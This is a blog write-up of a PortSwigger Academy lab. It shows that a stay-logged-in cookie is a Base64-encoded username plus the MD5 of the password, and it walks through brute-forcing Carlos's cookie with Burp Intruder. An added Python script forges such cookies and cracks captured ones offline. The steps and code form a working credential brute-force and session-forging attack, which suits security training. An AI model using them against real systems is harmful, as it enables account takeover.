PortSwigger Academy Lab: Brute-forcing a stay-logged-in cookie

Jun Takemura · March 17, 2025


Task

This lab allows users to stay logged in even after they close their browser session. The cookie used to provide this functionality is vulnerable to brute-forcing.

To solve the lab, brute-force Carlos’s cookie to gain access to his My account page.

Solution

After logging in with the "Stay logged in" option ticked, examine the stay-logged-in cookie. Base64-decoding it gives wiener:51dc30ddc473d43a6011e9ebba6ca770, i.e. the username, a colon, and a 32-character hex digest. Putting that digest into CrackStation identified it as the MD5 of my password, peter. So the cookie is just base64(username + ":" + md5(password)): it is not a random token, and anyone who can guess a user's password can forge that user's cookie offline.

In a request to /my-account?id=wiener, change id=wiener to id=carlos and send it to Intruder. Mark the value of the stay-logged-in cookie as the payload position. Paste the candidate passwords into the payload list.

Before starting the attack, log out and replace the session cookie in the Intruder request with the current (logged-out) one, so that access is granted only on the strength of the forged stay-logged-in cookie and not by a still-valid wiener session.

Under payload processing, add three rules in this order: Hash: MD5, Add prefix: carlos:, Encode: Base64-encode. The order matters because it has to reproduce how the cookie is built: the password is hashed first, the username prefix is put in front of the hash, and only then is the whole string Base64-encoded. Under Settings, add Update email to the Grep - Match panel; that string only appears on a My account page that is actually logged in. Start the attack. Request 21 was highlighted as matching, and the lab was solved.

One minor annoyance: the results table only shows the final, processed payload (the Base64-encoded hash), not the cleartext password. Since Intruder numbers requests in the same order as the payload list (request 0 is the unmodified baseline), save the password list to a .txt file and print line 21:

sed -n '21p' candidate.lst
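The same cookie construction and brute force, as an added example in Python rather than anything from the original post or from PortSwigger. It reproduces Intruder's processing chain (MD5, then the "carlos:" prefix, then Base64) so that a forged cookie can be built for any candidate, and it recovers the password from a captured cookie offline. The candidate list and the target cookie below are constructed for illustration: the target is built from a made-up password, not Carlos's real one, and in the lab the oracle is the server's response (the Update email grep match), not a local comparison.

```python
import base64
import hashlib
from typing import Iterable, Optional, Tuple

# Cookie layout observed in the lab: base64("<username>:" + md5(password))


def md5_hex(password: str) -> str:
    return hashlib.md5(password.encode()).hexdigest()


def forge_cookie(username: str, password: str) -> str:
    """Build a stay-logged-in value the way the Intruder rules do, in this
    order: hash MD5 -> add prefix "<username>:" -> Base64-encode."""
    raw = f"{username}:{md5_hex(password)}"
    return base64.b64encode(raw.encode()).decode()


def decode_cookie(cookie: str) -> Tuple[str, str]:
    """Split a captured cookie back into (username, md5 hex digest)."""
    user, digest = base64.b64decode(cookie).decode().split(":", 1)
    return user, digest


def crack_cookie(cookie: str, candidates: Iterable[str]) -> Optional[str]:
    """Offline recovery: return the candidate whose MD5 matches the digest in
    the cookie, or None. Against the live lab you would instead send
    forge_cookie("carlos", pw) for each pw and look for "Update email"."""
    _user, digest = decode_cookie(cookie)
    for pw in candidates:
        if md5_hex(pw) == digest:
            return pw
    return None


def password_for_request(candidates: list, request_no: int) -> str:
    """Map an Intruder request number back to the cleartext payload.
    Request 0 is the baseline, so request N used line N of the list."""
    return candidates[request_no - 1]


# Constructed candidate list (stand-in for the lab's password list).
CANDIDATES = ["123456", "password", "letmein", "dragon", "qwerty", "monkey"]

# Constructed target: a carlos cookie built from a made-up password.
TARGET_COOKIE = forge_cookie("carlos", "dragon")

if __name__ == "__main__":
    print("wiener cookie:", forge_cookie("wiener", "peter"))
    print("decoded      :", decode_cookie(forge_cookie("wiener", "peter")))
    found = crack_cookie(TARGET_COOKIE, CANDIDATES)
    print("recovered    :", found)
    print("request no   :", CANDIDATES.index(found) + 1)
```

Running it prints the wiener cookie whose decoded form is the wiener:51dc30... string seen in the lab, then recovers the constructed carlos password together with the Intruder request number it would correspond to, which is the lookup the sed one-liner above does by hand.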
